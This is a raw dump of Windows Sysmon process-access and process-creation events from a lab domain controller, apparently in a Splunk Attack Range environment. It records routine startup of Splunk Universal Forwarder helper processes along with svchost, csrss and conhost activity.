16:09:07.287{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030492Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.287{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030491Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.287{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030490Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.287{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-55A3-6008-E906-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030489Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.287{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-55A3-6008-E906-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030488Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:07.288{7901BC46-55A3-6008-E906-00000000A301}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030512Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:08.584{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-55A4-6008-EB06-00000000A301}7612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030511Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:08.584{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030510Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:08.584{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030509Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:08.584{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030508Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:08.584{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030507Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:08.584{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-55A4-6008-EB06-00000000A301}7612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030506Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:08.584{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-55A4-6008-EB06-00000000A301}7612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030505Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:08.585{7901BC46-55A4-6008-EB06-00000000A301}7612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030504Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:08.100{7901BC46-55A3-6008-EA06-00000000A301}23446892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030521Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:09.709{7901BC46-55A5-6008-EC06-00000000A301}68282156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030520Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:09.568{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-55A5-6008-EC06-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030519Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:09.568{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030518Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:09.568{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030517Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:09.568{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030516Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:09.568{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030515Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:09.568{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-55A5-6008-EC06-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030514Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:09.568{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-55A5-6008-EC06-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030513Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:09.569{7901BC46-55A5-6008-EC06-00000000A301}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030538Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.865{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-55A6-6008-EE06-00000000A301}7900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030537Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.865{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030536Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.865{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030535Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.865{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030534Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 